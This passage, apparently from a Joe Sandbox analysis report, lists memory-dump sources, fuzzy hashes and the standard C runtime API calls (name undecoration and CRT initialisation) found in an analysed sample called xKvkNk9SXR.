                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 600ffe6a644816df3f5b02fd1a0af55f0563e47301b2f226d4218cd1730eeb6c
                                          • Instruction ID: 6bf68527db4d92c953d1dbb3a6e8a6d636313c7f27d7ad77dc6105d470db131a
                                          • Opcode Fuzzy Hash: 600ffe6a644816df3f5b02fd1a0af55f0563e47301b2f226d4218cd1730eeb6c
                                          • Instruction Fuzzy Hash: 6E12FA717042118FDB48CF1DDCA574AB7E2EFC4318F0E8178A8498BB62D639DC958B86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08110c0e09ea0961ead174aee1735f221b7c8e19c526074062730efb4543f886
                                          • Instruction ID: d417ab0b73d6ef2c1b0c551f4cbd6317121ea9b5ab46a7bcefbc90127a067a95
                                          • Opcode Fuzzy Hash: 08110c0e09ea0961ead174aee1735f221b7c8e19c526074062730efb4543f886
                                          • Instruction Fuzzy Hash: 7F1249727083158BC708CE5DDC91759B7E2BBC8314F09453DA84ADB791EBB8ED498B82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 739f524cacb2361a0879b9a0a7446c7c45b2e8ea24027e5fd72e7f1e266f2a0b
                                          • Instruction ID: 47baa08d5b4d927e69a7ea3ff0310a62b6ecc6e96f7f5bdce880ca412d9c1e37
                                          • Opcode Fuzzy Hash: 739f524cacb2361a0879b9a0a7446c7c45b2e8ea24027e5fd72e7f1e266f2a0b
                                          • Instruction Fuzzy Hash: 8FE1F6B8A180548FC718CF89D1F49BDB7F1FB48301B21458DD4966B396C635AE62EF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b712166386aa8c67017c73479d5a6b6bd2e7c504b4333dc3fcd8a0828dd31965
                                          • Instruction ID: 0a9aaa877dd6874a986ceae966ea25ed49dbbf036f6f6148f839f2783558c17d
                                          • Opcode Fuzzy Hash: b712166386aa8c67017c73479d5a6b6bd2e7c504b4333dc3fcd8a0828dd31965
                                          • Instruction Fuzzy Hash: 17C17475900215DFDB28CF98C494ABAB7B1FF4C318F5A81BED90A6F746CA306941CB94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9334b3e7bc1a736629855850d90b8811e2b7170aef3660bb0d10393c6ae5cfae
                                          • Instruction ID: 6d0eea022fae40bf45b3c17942dde44c093e5806b6d3cdee706985cf68260e02
                                          • Opcode Fuzzy Hash: 9334b3e7bc1a736629855850d90b8811e2b7170aef3660bb0d10393c6ae5cfae
                                          • Instruction Fuzzy Hash: BA916D3190879A8BC711CF3CC5815AEF7E1BFD8348F459B1DE895A7212EB34BA858B41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a01076211383f58cc85f12ca07628130e8e4be89cf2fa5760a5f697b6e39385
                                          • Instruction ID: eff71ffdaad2bcf7939c036e16fa202e0b991db34cc817dbd3fc906a3d11fd13
                                          • Opcode Fuzzy Hash: 1a01076211383f58cc85f12ca07628130e8e4be89cf2fa5760a5f697b6e39385
                                          • Instruction Fuzzy Hash: 9461DC72E002299FDB08CFE9C89069EF7F6BB88310F5A817ED515F7340D6B45A119B94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 891c015d1a2d7b36379495272b334732dc7eb3e90e59676912e61425251e11b3
                                          • Instruction ID: 772edf8d5b46953289ffbf3ad819e741cb9a0e8e6d7b99ad233330fb10d21daa
                                          • Opcode Fuzzy Hash: 891c015d1a2d7b36379495272b334732dc7eb3e90e59676912e61425251e11b3
                                          • Instruction Fuzzy Hash: C2515072D1C4A814EB1D817E48B22FDBEF29B85202F0D82AAD9A3657D9C53943469B50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63d332fde8553ba23fe200a5e5228d41224fcd46687e6435b5faefb0ed1068eb
                                          • Instruction ID: 22941de74ae835831fde50d65272766c008c20b615f244b8854778fa9fae98d8
                                          • Opcode Fuzzy Hash: 63d332fde8553ba23fe200a5e5228d41224fcd46687e6435b5faefb0ed1068eb
                                          • Instruction Fuzzy Hash: 4061A255D18FD846E7038B3D98422E6B3A0BFFA299F18D706FDA436132EB21B6C55350
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50c998dd42e4ba29338149220065f640b11fbf168cf623e8c3432ab63f21f026
                                          • Instruction ID: eacec7d04484712bf395f30a92e0d90b4062595b2654944efa604bc55683f003
                                          • Opcode Fuzzy Hash: 50c998dd42e4ba29338149220065f640b11fbf168cf623e8c3432ab63f21f026
                                          • Instruction Fuzzy Hash: B7515271D1C4B814EB5D817E48B22FDBEF29B85202F0D82EAD5A3A57D9C53943069B50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71c1a7a7e7ac89b24f2c1a27495212d78f34c0e8f41029b5c764950033d53a1b
                                          • Instruction ID: a9d61a186dacf21e14b940889f5d1116b828d431f0e9df52ccb5d709ba823150
                                          • Opcode Fuzzy Hash: 71c1a7a7e7ac89b24f2c1a27495212d78f34c0e8f41029b5c764950033d53a1b
                                          • Instruction Fuzzy Hash: 1C515552648F6A91D72A0B3DC4912F3E3D1AFC530AF01C70EEDE569647E732E208B690
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                          • Instruction ID: 0fcf3308efdb72c7fa6e7583a6b960ecfdfebf1a47ece3acf29371ffa0268c45
                                          • Opcode Fuzzy Hash: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                          • Instruction Fuzzy Hash: E151BE32D04B998BD711CF3CC6855A9B7A2FFE9348F198799D8846B117EB30B6C98640
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                          • Instruction ID: a6d84fbe5572250582af88f0b93c5f060b60d1e782364f99574ba4c5eb723740
                                          • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                          • Instruction Fuzzy Hash: EA41A2327215168BD708CF38C895BA5F7E5FB98310F198769E42ACB2C2DB35E9108B84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee695aea11c2b820c539bf9e4eacb5729a281167743ae2e4f93cb1d75e79d2e2
                                          • Instruction ID: 3cab72b42a931257166870db88c7c37f06e00853de77c7a1a31f58b89cedf2e2
                                          • Opcode Fuzzy Hash: ee695aea11c2b820c539bf9e4eacb5729a281167743ae2e4f93cb1d75e79d2e2
                                          • Instruction Fuzzy Hash: 7B5113B1A087018FD365CF28D491A5AB7F4FF9D304B548A2EE49AD7610E730FA45CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e29863648bb678422ed74ed256fed52e60d0d6bd940ab2d06b45aebcc9680207
                                          • Instruction ID: e24bf10e168ae17f9988059dc2bb4ec1eb4192594f4e04b2be9870986351d212
                                          • Opcode Fuzzy Hash: e29863648bb678422ed74ed256fed52e60d0d6bd940ab2d06b45aebcc9680207
                                          • Instruction Fuzzy Hash: 334151CAC39F9C06E913A73558821D1E690AFFB4AD224E387FC7475672E712B5E52220
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 8939a6430bed331a9182b927980c7b328cf17336dc6af73983d4da9d3bd741e6
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 0D11C8B7200081C3D6148B2ED8B45B7A799FAC5323B2D4B6AD8424F7D8D633E94D9600
                                          APIs
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E2F3
                                            • Part of subcall function 00A5B218: DName::doPchar.LIBVCRUNTIME ref: 00A5B23F
                                          • DName::operator+.LIBCMT ref: 00A5E302
                                            • Part of subcall function 00A5B55A: DName::operator+=.LIBVCRUNTIME ref: 00A5B570
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E622
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00A5E62B
                                          • DName::operator+.LIBCMT ref: 00A5E639
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E642
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00A5E64B
                                          • DName::operator+.LIBCMT ref: 00A5E659
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E662
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00A5E66B
                                          • DName::operator+.LIBCMT ref: 00A5E679
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E682
                                          • DName::operator+.LIBCMT ref: 00A5E69B
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E6A4
                                          • DName::operator+.LIBCMT ref: 00A5E6B1
                                          • UnDecorator::getDataType.LIBVCRUNTIME ref: 00A5E6C0
                                            • Part of subcall function 00A5D416: DName::DName.LIBVCRUNTIME ref: 00A5D422
                                          • DName::operator+.LIBCMT ref: 00A5E6E8
                                          • DName::operator+.LIBCMT ref: 00A5E73A
                                          • DName::operator+=.LIBCMT ref: 00A5E6D8
                                            • Part of subcall function 00A5B623: DName::DName.LIBVCRUNTIME ref: 00A5B63D
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E2E0
                                            • Part of subcall function 00A5B451: DName::doPchar.LIBVCRUNTIME ref: 00A5B470
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E344
                                          • DName::operator+.LIBCMT ref: 00A5E350
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E35C
                                          • DName::operator+=.LIBCMT ref: 00A5E372
                                          • DName::operator+=.LIBCMT ref: 00A5E37C
                                          • UnDecorator::getZName.LIBVCRUNTIME ref: 00A5E3B5
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E3DD
                                          • DName::operator+.LIBCMT ref: 00A5E3EC
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E40C
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E423
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E49D
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E4C2
                                          • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00A5E502
                                          • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00A5E542
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E59D
                                          • DName::operator+.LIBCMT ref: 00A5E5B5
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E5DE
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E88E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Name::operator+Name::operator+=$Name$Name::$Decorator::get$Name::operator=$DimensionSigned$EncodingName::doPcharString$DataType
                                          • String ID: `anonymous namespace'$`string'$operator
                                          • API String ID: 2067090289-815891235
                                          • Opcode ID: a888781c17650d4cbe434380386cd63419c8eda324bfe63ebf4fd0311f36064a
                                          • Instruction ID: bc65a4e7a7618dcae67deadebc0559da85115e9b96562c2bc29f3335c0b17cd6
                                          • Opcode Fuzzy Hash: a888781c17650d4cbe434380386cd63419c8eda324bfe63ebf4fd0311f36064a
                                          • Instruction Fuzzy Hash: D502D1709002099FDF1CDFA4D995AFEBBB4BF19302F14045AE942A7191EB359B4ACB20
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00AD87E8,00000FA0,21472377,?,?,?,?,00A8EEC0,000000FF), ref: 00A40652
                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A8EEC0,000000FF), ref: 00A4065D
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A8EEC0,000000FF), ref: 00A4066E
                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A40684
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A40692
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A406A0
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A406CB
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A406D6
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,00A8EEC0,000000FF), ref: 00A406F9
                                          • ___scrt_fastfail.LIBCMT ref: 00A4070A
                                          • DeleteCriticalSection.KERNEL32(00AD87E8,00000007,?,?,?,?,00A8EEC0,000000FF), ref: 00A40715
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00A8EEC0,000000FF), ref: 00A40725
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AddressHandleProc$CriticalModuleSection__crt_fast_encode_pointer$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll$w#G!
                                          • API String ID: 2634751764-1939041831
                                          • Opcode ID: f28df31353aa8ced61e7fac7dad6c57169bea6b74f1f6f398c67a1461f351a07
                                          • Instruction ID: 512d989b11ea8170b15aaaa4371a4e1afef1a878943df05f75bf9624531f014e
                                          • Opcode Fuzzy Hash: f28df31353aa8ced61e7fac7dad6c57169bea6b74f1f6f398c67a1461f351a07
                                          • Instruction Fuzzy Hash: AA21D636741711BBCF119BF4AD49E2AB7E8EB85B51F100626FA02D6290DEB88C018664
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
